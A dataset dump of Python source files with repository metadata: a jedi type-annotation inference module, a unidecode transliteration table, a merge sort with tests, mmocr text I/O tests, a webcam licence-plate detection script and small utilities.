max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/utils/tools.py | Xuenew/2c | 0 | 17600 | <reponame>Xuenew/2c<gh_stars>0
#!/usr/bin/env python
"""
Created by howie.hu at 2021/4/7.
Description:通用函数
Changelog: all notable changes to this file will be documented
"""
import hashlib
def md5_encryption(string: str) -> str:
    """Return the 32-character lowercase hex MD5 digest of *string*.

    The input is UTF-8 encoded before hashing.  Note that despite the
    function name, MD5 is a hash, not encryption, and should only be used
    for fingerprinting/deduplication, never for security.

    :param string: 加密目标字符串 (text to hash)
    :return: hexadecimal digest string
    """
    return hashlib.md5(string.encode("utf-8")).hexdigest()
| 1.976563 | 2 |
anaconda-mode/0.1.13/jedi-0.15.1-py3.7.egg/jedi/evaluate/gradual/annotation.py | space-scl/emacs.d | 2 | 17601 | """
PEP 0484 ( https://www.python.org/dev/peps/pep-0484/ ) describes type hints
through function annotations. There is a strong suggestion in this document
that only the type of type hinting defined in PEP0484 should be allowed
as annotations in future python versions.
"""
import re
from parso import ParserSyntaxError, parse
from jedi._compatibility import force_unicode
from jedi.evaluate.cache import evaluator_method_cache
from jedi.evaluate.base_context import ContextSet, NO_CONTEXTS
from jedi.evaluate.gradual.typing import TypeVar, LazyGenericClass, \
AbstractAnnotatedClass
from jedi.evaluate.gradual.typing import GenericClass
from jedi.evaluate.helpers import is_string
from jedi.evaluate.compiled import builtin_from_name
from jedi import debug
from jedi import parser_utils
def eval_annotation(context, annotation):
    """
    Evaluates an annotation node. This means that it evaluates the part of
    `int` here:

        foo: int = 3

    Also checks for forward references (strings).

    :param context: jedi context used to resolve names in the annotation.
    :param annotation: parso node of the annotation expression.
    :return: a ContextSet of the evaluated annotation.
    """
    context_set = context.eval_node(annotation)
    if len(context_set) != 1:
        # An annotation should evaluate to exactly one thing; warn but still
        # hand back whatever we got.
        debug.warning("Eval'ed typing index %s should lead to 1 object, "
                      " not %s" % (annotation, context_set))
        return context_set

    evaled_context = list(context_set)[0]
    if is_string(evaled_context):
        # A string annotation is a forward reference: parse and re-evaluate it.
        result = _get_forward_reference_node(context, evaled_context.get_safe_value())
        if result is not None:
            return context.eval_node(result)
    return context_set
def _evaluate_annotation_string(context, string, index=None):
    """
    Parse and evaluate a string annotation (forward reference).

    :param index: when given, the annotation is expected to evaluate to a
        tuple type and only the *index*-th element is returned (used for
        Python 2 style type comments on tuple assignments).
    """
    node = _get_forward_reference_node(context, string)
    if node is None:
        return NO_CONTEXTS

    context_set = context.eval_node(node)
    if index is not None:
        # Select one element out of a tuple annotation, guarding against
        # non-tuple results and tuples that are too short.
        context_set = context_set.filter(
            lambda context: context.array_type == u'tuple'  # noqa
            and len(list(context.py__iter__())) >= index
        ).py__simple_getitem__(index)
    return context_set
def _get_forward_reference_node(context, string):
    """
    Parse *string* as a single expression and return the new parso node,
    or None when the string is not valid Python.
    """
    try:
        new_node = context.evaluator.grammar.parse(
            force_unicode(string),
            start_symbol='eval_input',
            error_recovery=False
        )
    except ParserSyntaxError:
        debug.warning('Annotation not parsed: %s' % string)
        return None
    else:
        module = context.tree_node.get_root_node()
        # Anchor the freshly parsed node at the end of the module and hook it
        # into the existing tree so name resolution from it works.
        parser_utils.move(new_node, module.end_pos[0])
        new_node.parent = context.tree_node
        return new_node
def _split_comment_param_declaration(decl_text):
    """
    Split decl_text on commas, but group generic expressions
    together.

    For example, given "foo, Bar[baz, biz]" we return
    ['foo', 'Bar[baz, biz]'].
    """
    try:
        # Parse the declaration so that commas nested inside [] do not split.
        node = parse(decl_text, error_recovery=False).children[0]
    except ParserSyntaxError:
        debug.warning('Comment annotation is not valid Python: %s' % decl_text)
        return []

    if node.type == 'name':
        # A single bare name, e.g. "foo".
        return [node.get_code().strip()]

    params = []
    try:
        children = node.children
    except AttributeError:
        # A leaf node other than a name (e.g. a literal): nothing to split.
        return []
    else:
        # Keep only the parameter-like children; comma operators are skipped.
        for child in children:
            if child.type in ['name', 'atom_expr', 'power']:
                params.append(child.get_code().strip())
    return params
@evaluator_method_cache()
def infer_param(execution_context, param):
    """
    Infer the contexts of a function parameter, wrapping ``*args`` in a
    ``tuple`` generic and ``**kwargs`` in a ``dict`` generic as PEP 484
    prescribes (an annotation ``T`` means ``Tuple[T, ...]`` / ``Dict[str, T]``).

    :param execution_context: the function execution being analyzed.
    :param param: the parso param node.
    :return: a ContextSet for the parameter's type.
    """
    contexts = _infer_param(execution_context, param)
    evaluator = execution_context.evaluator
    if param.star_count == 1:
        # *args: the annotated type is the tuple's element type.
        # NOTE(review): the loop variable `c` is unused, so this builds one
        # identical GenericClass per inferred context; kept as-is to preserve
        # behavior -- confirm whether a single instance was intended.
        tuple_ = builtin_from_name(evaluator, 'tuple')
        return ContextSet([GenericClass(
            tuple_,
            generics=(contexts,),
        ) for c in contexts])
    elif param.star_count == 2:
        # **kwargs: keys are str, values are the annotated type.
        dct = builtin_from_name(evaluator, 'dict')
        return ContextSet([GenericClass(
            dct,
            generics=(ContextSet([builtin_from_name(evaluator, 'str')]), contexts),
        ) for c in contexts])
        # (the unreachable `pass` that followed this return was removed)
    return contexts
def _infer_param(execution_context, param):
    """
    Infers the type of a function parameter, using type annotations.

    Falls back to a Python 2 style ``# type: (...) -> ...`` comment on the
    function when the parameter has no inline annotation.
    """
    annotation = param.annotation
    if annotation is None:
        # If no Python 3-style annotation, look for a Python 2-style comment
        # annotation.
        # Identify parameters to function in the same sequence as they would
        # appear in a type comment.
        all_params = [child for child in param.parent.children
                      if child.type == 'param']

        node = param.parent.parent
        comment = parser_utils.get_following_comment_same_line(node)
        if comment is None:
            return NO_CONTEXTS

        match = re.match(r"^#\s*type:\s*\(([^#]*)\)\s*->", comment)
        if not match:
            return NO_CONTEXTS
        params_comments = _split_comment_param_declaration(match.group(1))

        # Find the specific param being investigated
        index = all_params.index(param)
        # If the number of parameters doesn't match length of type comment,
        # ignore first parameter (assume it's self).
        if len(params_comments) != len(all_params):
            debug.warning(
                "Comments length != Params length %s %s",
                params_comments, all_params
            )
        # Imported here, presumably to avoid a circular import -- TODO confirm.
        from jedi.evaluate.context.instance import InstanceArguments
        if isinstance(execution_context.var_args, InstanceArguments):
            if index == 0:
                # Assume it's self, which is already handled
                return NO_CONTEXTS
            # Bound call: the type comment does not cover `self`.
            index -= 1

        if index >= len(params_comments):
            # No comment entry for this parameter.
            return NO_CONTEXTS

        param_comment = params_comments[index]
        return _evaluate_annotation_string(
            execution_context.function_context.get_default_param_context(),
            param_comment
        )
    # Annotations are like default params and resolve in the same way.
    context = execution_context.function_context.get_default_param_context()
    return eval_annotation(context, annotation)
def py__annotations__(funcdef):
    """Collect the annotation nodes of *funcdef*, keyed by parameter name.

    The return annotation, when present, is stored under the key
    ``'return'``, mirroring the runtime ``__annotations__`` mapping.
    """
    annotations = {
        par.name.value: par.annotation
        for par in funcdef.get_params()
        if par.annotation is not None
    }
    if funcdef.annotation:
        annotations['return'] = funcdef.annotation
    return annotations
@evaluator_method_cache()
def infer_return_types(function_execution_context):
    """
    Infers the type of a function's return value,
    according to type annotations.

    Falls back to a Python 2 style ``# type: (...) -> X`` comment when there
    is no inline return annotation, and resolves function-local TypeVars
    against the actual arguments of this execution.
    """
    all_annotations = py__annotations__(function_execution_context.tree_node)
    annotation = all_annotations.get("return", None)
    if annotation is None:
        # If there is no Python 3-type annotation, look for a Python 2-type annotation
        node = function_execution_context.tree_node
        comment = parser_utils.get_following_comment_same_line(node)
        if comment is None:
            return NO_CONTEXTS

        match = re.match(r"^#\s*type:\s*\([^#]*\)\s*->\s*([^#]*)", comment)
        if not match:
            return NO_CONTEXTS

        return _evaluate_annotation_string(
            function_execution_context.function_context.get_default_param_context(),
            match.group(1).strip()
        ).execute_annotation()

    # NOTE(review): unreachable -- annotation is always non-None here because
    # the None case returned above.
    if annotation is None:
        return NO_CONTEXTS

    context = function_execution_context.function_context.get_default_param_context()
    unknown_type_vars = list(find_unknown_type_vars(context, annotation))
    annotation_contexts = eval_annotation(context, annotation)
    if not unknown_type_vars:
        # No open TypeVars: simply instantiate the annotated type.
        return annotation_contexts.execute_annotation()

    # Bind the open TypeVars using the actual arguments of this call.
    type_var_dict = infer_type_vars_for_execution(function_execution_context, all_annotations)

    return ContextSet.from_sets(
        ann.define_generics(type_var_dict)
        if isinstance(ann, (AbstractAnnotatedClass, TypeVar)) else ContextSet({ann})
        for ann in annotation_contexts
    ).execute_annotation()
def infer_type_vars_for_execution(execution_context, annotation_dict):
    """
    Some functions use type vars that are not defined by the class, but rather
    only defined in the function. See for example `iter`. In those cases we
    want to:

    1. Search for undefined type vars.
    2. Infer type vars with the execution state we have.
    3. Return the union of all type vars that have been found.

    :param annotation_dict: mapping of parameter name -> annotation node, as
        produced by :func:`py__annotations__`.
    :return: dict of type var name -> ContextSet of inferred types.
    """
    context = execution_context.function_context.get_default_param_context()

    annotation_variable_results = {}
    executed_params, _ = execution_context.get_executed_params_and_issues()
    for executed_param in executed_params:
        try:
            annotation_node = annotation_dict[executed_param.string_name]
        except KeyError:
            # Parameter without an annotation: nothing to infer from it.
            continue

        annotation_variables = find_unknown_type_vars(context, annotation_node)
        if annotation_variables:
            # Infer unknown type var
            annotation_context_set = context.eval_node(annotation_node)
            star_count = executed_param._param_node.star_count
            actual_context_set = executed_param.infer(use_hints=False)
            if star_count == 1:
                # *args packs the values into a tuple; match the element types.
                actual_context_set = actual_context_set.merge_types_of_iterate()
            elif star_count == 2:
                # TODO _dict_values is not public.
                actual_context_set = actual_context_set.try_merge('_dict_values')
            for ann in annotation_context_set:
                _merge_type_var_dicts(
                    annotation_variable_results,
                    _infer_type_vars(ann, actual_context_set),
                )

    return annotation_variable_results
def _merge_type_var_dicts(base_dict, new_dict):
for type_var_name, contexts in new_dict.items():
try:
base_dict[type_var_name] |= contexts
except KeyError:
base_dict[type_var_name] = contexts
def _infer_type_vars(annotation_context, context_set):
    """
    This function tries to find information about undefined type vars and
    returns a dict from type var name to context set.

    This is for example important to understand what `iter([1])` returns.
    According to typeshed, `iter` returns an `Iterator[_T]`:

        def iter(iterable: Iterable[_T]) -> Iterator[_T]: ...

    This function would generate `int` for `_T` in this case, because it
    unpacks the `Iterable`.
    """
    type_var_dict = {}
    if isinstance(annotation_context, TypeVar):
        # A bare TypeVar is matched directly against the classes of the
        # actual values.
        return {annotation_context.py__name__(): context_set.py__class__()}
    elif isinstance(annotation_context, LazyGenericClass):
        name = annotation_context.py__name__()
        if name == 'Iterable':
            given = annotation_context.get_generics()
            if given:
                # Iterable[T]: match T against the element types of the values.
                for nested_annotation_context in given[0]:
                    _merge_type_var_dicts(
                        type_var_dict,
                        _infer_type_vars(
                            nested_annotation_context,
                            context_set.merge_types_of_iterate()
                        )
                    )
        elif name == 'Mapping':
            given = annotation_context.get_generics()
            if len(given) == 2:
                # Mapping[K, V]: match K and V against key/value contexts of
                # every actual value that exposes them.
                for context in context_set:
                    try:
                        method = context.get_mapping_item_contexts
                    except AttributeError:
                        # Not a mapping-like context; skip it.
                        continue
                    key_contexts, value_contexts = method()

                    for nested_annotation_context in given[0]:
                        _merge_type_var_dicts(
                            type_var_dict,
                            _infer_type_vars(
                                nested_annotation_context,
                                key_contexts,
                            )
                        )
                    for nested_annotation_context in given[1]:
                        _merge_type_var_dicts(
                            type_var_dict,
                            _infer_type_vars(
                                nested_annotation_context,
                                value_contexts,
                            )
                        )
    return type_var_dict
def find_type_from_comment_hint_for(context, node, name):
    """Type-comment lookup for a ``for`` statement; the targets are
    ``node.children[1]`` (presumably the loop variable list -- TODO confirm)."""
    return _find_type_from_comment_hint(context, node, node.children[1], name)
def find_type_from_comment_hint_with(context, node, name):
    """Type-comment lookup for a ``with`` statement; the target is the node
    after ``as`` in ``foo() as f``."""
    assert len(node.children[1].children) == 3, \
        "Can only be here when children[1] is 'foo() as f'"
    varlist = node.children[1].children[2]
    return _find_type_from_comment_hint(context, node, varlist, name)
def find_type_from_comment_hint_assign(context, node, name):
    """Type-comment lookup for an assignment; targets are ``node.children[0]``."""
    return _find_type_from_comment_hint(context, node, node.children[0], name)
def _find_type_from_comment_hint(context, node, varlist, name):
    """
    Evaluate a trailing ``# type: ...`` comment after *node* and return the
    instantiated contexts for the assignment target *name*.

    When *varlist* is a tuple-like target (``a, b = ...``), the position of
    *name* among the targets selects the matching element of the commented
    tuple type; otherwise the whole annotation applies.
    """
    index = None
    if varlist.type in ("testlist_star_expr", "exprlist", "testlist"):
        # something like "a, b = 1, 2"
        index = 0
        for child in varlist.children:
            if child == name:
                break
            if child.type == "operator":
                # Comma separators do not count towards the index.
                continue
            index += 1
        else:
            # *name* is not among the targets.
            return []

    comment = parser_utils.get_following_comment_same_line(node)
    if comment is None:
        return []
    match = re.match(r"^#\s*type:\s*([^#]*)", comment)
    if match is None:
        return []
    return _evaluate_annotation_string(
        context, match.group(1).strip(), index
    ).execute_annotation()
def find_unknown_type_vars(context, node):
    """
    Return the TypeVar contexts referenced by annotation *node*, in order of
    first appearance and without duplicates.
    """
    def check_node(node):
        if node.type in ('atom_expr', 'power'):
            trailer = node.children[-1]
            if trailer.type == 'trailer' and trailer.children[0] == '[':
                # Subscripted generic like List[T]: recurse into the indexes.
                for subscript_node in _unpack_subscriptlist(trailer.children[1]):
                    check_node(subscript_node)
        else:
            type_var_set = context.eval_node(node)
            for type_var in type_var_set:
                if isinstance(type_var, TypeVar) and type_var not in found:
                    found.append(type_var)

    found = []  # We're not using a set, because the order matters.
    check_node(node)
    return found
def _unpack_subscriptlist(subscriptlist):
if subscriptlist.type == 'subscriptlist':
for subscript in subscriptlist.children[::2]:
if subscript.type != 'subscript':
yield subscript
else:
if subscriptlist.type != 'subscript':
yield subscriptlist
| 3.109375 | 3 |
string_30.py | Technicoryx/python_strings_inbuilt_functions | 0 | 17602 | """Below Python Programme demonstrate rpartition
functions in a string"""
string = "Python is fun"
# 'is' separator is found
print(string.rpartition('is '))
# 'not' separator is not found
print(string.rpartition('not '))
string = "Python is fun, isn't it"
# splits at last occurence of 'is'
print(string.rpartition('is'))
| 4.09375 | 4 |
env/lib/python3.8/site-packages/unidecode/x054.py | avdhari/enigma | 48 | 17603 | <filename>env/lib/python3.8/site-packages/unidecode/x054.py
data = (
'Mie ', # 0x00
'Xu ', # 0x01
'Mang ', # 0x02
'Chi ', # 0x03
'Ge ', # 0x04
'Xuan ', # 0x05
'Yao ', # 0x06
'Zi ', # 0x07
'He ', # 0x08
'Ji ', # 0x09
'Diao ', # 0x0a
'Cun ', # 0x0b
'Tong ', # 0x0c
'Ming ', # 0x0d
'Hou ', # 0x0e
'Li ', # 0x0f
'Tu ', # 0x10
'Xiang ', # 0x11
'Zha ', # 0x12
'Xia ', # 0x13
'Ye ', # 0x14
'Lu ', # 0x15
'A ', # 0x16
'Ma ', # 0x17
'Ou ', # 0x18
'Xue ', # 0x19
'Yi ', # 0x1a
'Jun ', # 0x1b
'Chou ', # 0x1c
'Lin ', # 0x1d
'Tun ', # 0x1e
'Yin ', # 0x1f
'Fei ', # 0x20
'Bi ', # 0x21
'Qin ', # 0x22
'Qin ', # 0x23
'Jie ', # 0x24
'Bu ', # 0x25
'Fou ', # 0x26
'Ba ', # 0x27
'Dun ', # 0x28
'Fen ', # 0x29
'E ', # 0x2a
'Han ', # 0x2b
'Ting ', # 0x2c
'Hang ', # 0x2d
'Shun ', # 0x2e
'Qi ', # 0x2f
'Hong ', # 0x30
'Zhi ', # 0x31
'Shen ', # 0x32
'Wu ', # 0x33
'Wu ', # 0x34
'Chao ', # 0x35
'Ne ', # 0x36
'Xue ', # 0x37
'Xi ', # 0x38
'Chui ', # 0x39
'Dou ', # 0x3a
'Wen ', # 0x3b
'Hou ', # 0x3c
'Ou ', # 0x3d
'Wu ', # 0x3e
'Gao ', # 0x3f
'Ya ', # 0x40
'Jun ', # 0x41
'Lu ', # 0x42
'E ', # 0x43
'Ge ', # 0x44
'Mei ', # 0x45
'Ai ', # 0x46
'Qi ', # 0x47
'Cheng ', # 0x48
'Wu ', # 0x49
'Gao ', # 0x4a
'Fu ', # 0x4b
'Jiao ', # 0x4c
'Hong ', # 0x4d
'Chi ', # 0x4e
'Sheng ', # 0x4f
'Ne ', # 0x50
'Tun ', # 0x51
'Fu ', # 0x52
'Yi ', # 0x53
'Dai ', # 0x54
'Ou ', # 0x55
'Li ', # 0x56
'Bai ', # 0x57
'Yuan ', # 0x58
'Kuai ', # 0x59
'[?] ', # 0x5a
'Qiang ', # 0x5b
'Wu ', # 0x5c
'E ', # 0x5d
'Shi ', # 0x5e
'Quan ', # 0x5f
'Pen ', # 0x60
'Wen ', # 0x61
'Ni ', # 0x62
'M ', # 0x63
'Ling ', # 0x64
'Ran ', # 0x65
'You ', # 0x66
'Di ', # 0x67
'Zhou ', # 0x68
'Shi ', # 0x69
'Zhou ', # 0x6a
'Tie ', # 0x6b
'Xi ', # 0x6c
'Yi ', # 0x6d
'Qi ', # 0x6e
'Ping ', # 0x6f
'Zi ', # 0x70
'Gu ', # 0x71
'Zi ', # 0x72
'Wei ', # 0x73
'Xu ', # 0x74
'He ', # 0x75
'Nao ', # 0x76
'Xia ', # 0x77
'Pei ', # 0x78
'Yi ', # 0x79
'Xiao ', # 0x7a
'Shen ', # 0x7b
'Hu ', # 0x7c
'Ming ', # 0x7d
'Da ', # 0x7e
'Qu ', # 0x7f
'Ju ', # 0x80
'Gem ', # 0x81
'Za ', # 0x82
'Tuo ', # 0x83
'Duo ', # 0x84
'Pou ', # 0x85
'Pao ', # 0x86
'Bi ', # 0x87
'Fu ', # 0x88
'Yang ', # 0x89
'He ', # 0x8a
'Zha ', # 0x8b
'He ', # 0x8c
'Hai ', # 0x8d
'Jiu ', # 0x8e
'Yong ', # 0x8f
'Fu ', # 0x90
'Que ', # 0x91
'Zhou ', # 0x92
'Wa ', # 0x93
'Ka ', # 0x94
'Gu ', # 0x95
'Ka ', # 0x96
'Zuo ', # 0x97
'Bu ', # 0x98
'Long ', # 0x99
'Dong ', # 0x9a
'Ning ', # 0x9b
'Tha ', # 0x9c
'Si ', # 0x9d
'Xian ', # 0x9e
'Huo ', # 0x9f
'Qi ', # 0xa0
'Er ', # 0xa1
'E ', # 0xa2
'Guang ', # 0xa3
'Zha ', # 0xa4
'Xi ', # 0xa5
'Yi ', # 0xa6
'Lie ', # 0xa7
'Zi ', # 0xa8
'Mie ', # 0xa9
'Mi ', # 0xaa
'Zhi ', # 0xab
'Yao ', # 0xac
'Ji ', # 0xad
'Zhou ', # 0xae
'Ge ', # 0xaf
'Shuai ', # 0xb0
'Zan ', # 0xb1
'Xiao ', # 0xb2
'Ke ', # 0xb3
'Hui ', # 0xb4
'Kua ', # 0xb5
'Huai ', # 0xb6
'Tao ', # 0xb7
'Xian ', # 0xb8
'E ', # 0xb9
'Xuan ', # 0xba
'Xiu ', # 0xbb
'Wai ', # 0xbc
'Yan ', # 0xbd
'Lao ', # 0xbe
'Yi ', # 0xbf
'Ai ', # 0xc0
'Pin ', # 0xc1
'Shen ', # 0xc2
'Tong ', # 0xc3
'Hong ', # 0xc4
'Xiong ', # 0xc5
'Chi ', # 0xc6
'Wa ', # 0xc7
'Ha ', # 0xc8
'Zai ', # 0xc9
'Yu ', # 0xca
'Di ', # 0xcb
'Pai ', # 0xcc
'Xiang ', # 0xcd
'Ai ', # 0xce
'Hen ', # 0xcf
'Kuang ', # 0xd0
'Ya ', # 0xd1
'Da ', # 0xd2
'Xiao ', # 0xd3
'Bi ', # 0xd4
'Yue ', # 0xd5
'[?] ', # 0xd6
'Hua ', # 0xd7
'Sasou ', # 0xd8
'Kuai ', # 0xd9
'Duo ', # 0xda
'[?] ', # 0xdb
'Ji ', # 0xdc
'Nong ', # 0xdd
'Mou ', # 0xde
'Yo ', # 0xdf
'Hao ', # 0xe0
'Yuan ', # 0xe1
'Long ', # 0xe2
'Pou ', # 0xe3
'Mang ', # 0xe4
'Ge ', # 0xe5
'E ', # 0xe6
'Chi ', # 0xe7
'Shao ', # 0xe8
'Li ', # 0xe9
'Na ', # 0xea
'Zu ', # 0xeb
'He ', # 0xec
'Ku ', # 0xed
'Xiao ', # 0xee
'Xian ', # 0xef
'Lao ', # 0xf0
'Bo ', # 0xf1
'Zhe ', # 0xf2
'Zha ', # 0xf3
'Liang ', # 0xf4
'Ba ', # 0xf5
'Mie ', # 0xf6
'Le ', # 0xf7
'Sui ', # 0xf8
'Fou ', # 0xf9
'Bu ', # 0xfa
'Han ', # 0xfb
'Heng ', # 0xfc
'Geng ', # 0xfd
'Shuo ', # 0xfe
'Ge ', # 0xff
)
| 1.304688 | 1 |
merge_sort.py | BCLaird/refreshers | 0 | 17604 | <filename>merge_sort.py<gh_stars>0
import sys
import unittest
def merge(nums1, nums2):
    """
    Merge two sorted lists into a single sorted list.

    Runs in O(len(nums1) + len(nums2)).  Unlike the previous version, this
    does not call list.pop(0) (O(n) per call, O(n^2) overall) and leaves the
    input lists unchanged.

    :param nums1: Sorted list of numbers.
    :param nums2: Sorted list of numbers.
    :return: Combined sorted list of numbers.
    """
    merged = []
    i = j = 0
    while i < len(nums1) and j < len(nums2):
        # <= keeps the merge stable (ties favor nums1).
        if nums1[i] <= nums2[j]:
            merged.append(nums1[i])
            i += 1
        else:
            merged.append(nums2[j])
            j += 1
    # At most one of these extends; both are no-ops once exhausted.
    merged.extend(nums1[i:])
    merged.extend(nums2[j:])
    return merged


def merge_sort(nums):
    """
    Sort a list of numbers with a top-down merge sort.

    Fixes two defects of the previous version: ``len(nums) / 2`` is a float
    under Python 3 (TypeError when used as a slice index) and an empty input
    recursed forever.

    :param nums: List of numbers to sort.
    :return: Sorted list of numbers.
    """
    if len(nums) <= 1:
        # A list of length 0 or 1 is already sorted.
        return nums
    mid = len(nums) // 2
    return merge(merge_sort(nums[:mid]), merge_sort(nums[mid:]))
class TestInsertionSort(unittest.TestCase):
    """Unit tests for merge_sort.

    NOTE(review): the class name says "InsertionSort" but it exercises
    merge_sort; kept unchanged so external test selection by name still works.
    Local variables were renamed so the builtin ``sorted`` is no longer
    shadowed.
    """

    def test_one(self):
        # A single-element list is already sorted.
        self.assertEqual([1], merge_sort([1]))

    def test_two(self):
        data = [2, 1]
        expected = [1, 2]
        self.assertEqual(expected, merge_sort(data))

    def test_three(self):
        data = [2, 3, 1]
        expected = [1, 2, 3]
        self.assertEqual(expected, merge_sort(data))

    def test_reversed(self):
        data = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
        expected = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
        self.assertEqual(expected, merge_sort(data))

    def test_front_half_sorted(self):
        data = [1, 2, 3, 4, 5, 10, 9, 8, 7, 6]
        expected = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
        self.assertEqual(expected, merge_sort(data))

    def test_back_half_sorted(self):
        data = [5, 4, 3, 2, 1, 6, 7, 8, 9, 10]
        expected = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
        self.assertEqual(expected, merge_sort(data))
if __name__ == "__main__":
    # Announce the module, then run the unittest suite.  unittest.main()
    # raises SystemExit itself when done; sys.exit() here is belt-and-braces.
    # NOTE(review): "<NAME>" looks like a redacted author placeholder in the
    # banner string -- confirm the intended text.
    sys.stdout.write("<NAME>aird merge_sort module. Test mode.\n")
    sys.exit(unittest.main())
| 3.890625 | 4 |
tests/test_utils/test_textio.py | hongxuenong/mmocr | 2,261 | 17605 | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from mmocr.utils import list_from_file, list_to_file
# Fixture: line collections covering edge cases for the text I/O round-trip
# tests below -- empty list, whitespace-only entries, non-string scalars
# (int/float are str()-ed on write), multiple entries, and non-ASCII text
# (CJK, accented Latin, Cyrillic).
lists = [
    [],
    [' '],
    ['\t'],
    ['a'],
    [1],
    [1.],
    ['a', 'b'],
    ['a', 1, 1.],
    [1, 1., 'a'],
    ['啊', '啊啊'],
    ['選択', 'noël', 'Информацией', 'ÄÆä'],
]
def test_list_to_file():
    """Round-trip every fixture in `lists` through list_to_file and verify
    the written lines match after str() conversion."""
    with tempfile.TemporaryDirectory() as tmpdirname:
        for i, lines in enumerate(lists):
            filename = f'{tmpdirname}/{i}.txt'
            list_to_file(filename, lines)
            # Read back with an explicitly closed handle (the previous
            # version opened the file inside a list comprehension and never
            # closed it, leaking the handle).
            with open(filename, 'r', encoding='utf-8') as f:
                lines2 = [line.rstrip('\r\n') for line in f]
            lines = list(map(str, lines))
            assert len(lines) == len(lines2)
            assert all(line1 == line2 for line1, line2 in zip(lines, lines2))
def test_list_from_file():
    # Exercise reading in plain and BOM-prefixed UTF-8 with both Unix and
    # Windows line endings; every fixture in `lists` must round-trip.
    with tempfile.TemporaryDirectory() as tmpdirname:
        for encoding in ['utf-8', 'utf-8-sig']:
            for lineend in ['\n', '\r\n']:
                for i, lines in enumerate(lists):
                    filename = f'{tmpdirname}/{i}.txt'
                    with open(filename, 'w', encoding=encoding) as f:
                        f.writelines(f'{line}{lineend}' for line in lines)
                    lines2 = list_from_file(filename, encoding=encoding)
                    # Non-string fixtures were written via str(); compare alike.
                    lines = list(map(str, lines))
                    assert len(lines) == len(lines2)
                    assert all(line1 == line2
                               for line1, line2 in zip(lines, lines2))
| 2.9375 | 3 |
License Plate Detection.py | jairajsahgal/License_Plate_and_Face_Recognition | 0 | 17606 | import cv2
from Text_Detection import detect_characters, detect_string, detect_words
import re
from live_recognition import facial_recognition
#
def rescale_frame(frame, percent=75):
    """Return *frame* resized to *percent* percent of its original size.

    :param frame: image array whose .shape is (height, width, ...).
    :param percent: target size as a percentage of the original.
    :return: the resized image, using cv2.INTER_AREA interpolation.
    """
    new_w = int(frame.shape[1] * percent / 100)
    new_h = int(frame.shape[0] * percent / 100)
    return cv2.resize(frame, (new_w, new_h), interpolation=cv2.INTER_AREA)
####################################################
# Capture / detection configuration
frameWidth = 640      # capture width in pixels
frameHeight = 480     # capture height in pixels
# Haar cascade trained for rectangular (Russian-style) licence plates.
nPlateCascade = cv2.CascadeClassifier("../../Resources/haarcascade_russian_plate_number.xml")
minArea=500           # minimum detection area (px^2) accepted as a plate
color=(255,0,255)     # BGR color for drawn rectangles and text
name=None             # cached face-recognition result; stays None until first match
# count = 0
# Two-letter Indian state/UT registration codes, in upper and lower case.
state_codes = ['AP', 'AR', 'AS', 'BR', 'CG', 'GA', 'GJ', 'HR', 'HP', 'JH', 'KA', 'KL', 'MP', 'MH', 'MN', 'ML', 'MZ', 'NL', 'OD', 'PB', 'RJ', 'SK', 'TN', 'TR', 'UP', 'WB', 'TS','ap', 'ar', 'as', 'br', 'cg', 'ga', 'gj', 'hr', 'hp', 'jh', 'ka', 'kl', 'mp', 'mh', 'mn', 'ml', 'mz', 'nl', 'od', 'pb', 'rj', 'sk', 'tn', 'tr', 'up', 'wb', 'ts']
######################################################
# cap = cv2.VideoCapture("C:\\Users\\jaira\\PycharmProjects\\opencv_tutorial\\Resources\\test.mp4")
cap=cv2.VideoCapture(0,cv2.CAP_DSHOW)  # webcam 0 via DirectShow (Windows)
cap.set(3, frameWidth)   # property 3 = frame width
cap.set(4, frameHeight)  # property 4 = frame height
cap.set(10,150)          # property 10 = brightness
success, img = cap.read()  # prime the loop with a first frame
# Main loop: detect plate candidates per frame, OCR them, validate the text
# against Indian plate conventions, then run face recognition once.
while success:
    success, img = cap.read()
    imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # scaleFactor 1.1, minNeighbors 4
    numberPlates = nPlateCascade.detectMultiScale(imgGray, 1.1, 4)
    for (x, y, w, h) in numberPlates:
        area = w*h
        if area > minArea:
            # Outline the candidate plate on the live frame.
            cv2.rectangle(img=img,pt1=(x,y),pt2=(x+w,y+h),
                          color=color,thickness=2)
            # cv2.putText(img=img,text="Number Plate",org=(x,y-5),fontFace=cv2.FONT_HERSHEY_COMPLEX_SMALL,color=color,fontScale=1,thickness=2)
            imgRoi=img[y:y+h,x:x+w]  # crop the region of interest
            cv2.moveWindow("ROI",40,30)
            cv2.imshow(winname="ROI",mat=imgRoi)
            temp=detect_words(imgRoi)  # OCR the cropped plate
            for i in state_codes:
                if i in temp:
                    # NOTE(review): temp2 is computed but never used.
                    temp2 = ''.join(ch for ch in temp if ch.isalnum() and ch!="." and ch!="_")
                    # Plausible plate: 10 chars, digits at positions 2-3 and the end.
                    if temp[-2:].isnumeric() and temp[2:4].isnumeric() and len(temp)==10:
                        cv2.putText(img=img,text=temp,org=(x,y-5),fontFace=cv2.FONT_HERSHEY_COMPLEX_SMALL,color=color,fontScale=1,thickness=2)
                        print(temp)
                        if name==None:
                            # Only run face recognition until the first match.
                            name,face_img=facial_recognition(img)
                            cv2.imshow("Face Recognition",face_img)
    cv2.imshow("Result", img)
    # Quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
    # except:
    #     break
cv2.destroyAllWindows()
LogParser/LTEV2.py | a22057916w/python_advance | 0 | 17607 | ##! python3
##==============================================================================
## Copyright (c) 2021 COMPAL Electronic Inc. All rights reserved.
## This program contains proprietary and confidential information.
## All rights reserved except as may be permitted by prior written consent.
##
## Compal STiD NPSD Test Program Release Notification.
##
## ModuleName:
## LTE.py (Log to Excel)
##
## Abstract:
## Parsing log info to a excel with 4 sheets.
## 1. Read log file: parse -> store (a list of dict)
## 2. Read the INI threshold data: store as dict
## 3. New excel workbook: by openpyxl
## 4. Set worksheet according to Step 1: by dict and DataFrame
## 5. Set condition formating for each sheet
## according to Step 2: by dict
## 6. Save the workbook to xlsx file
##
## Author:
## 25-Oct-2021 <NAME>
##
## Revision History:
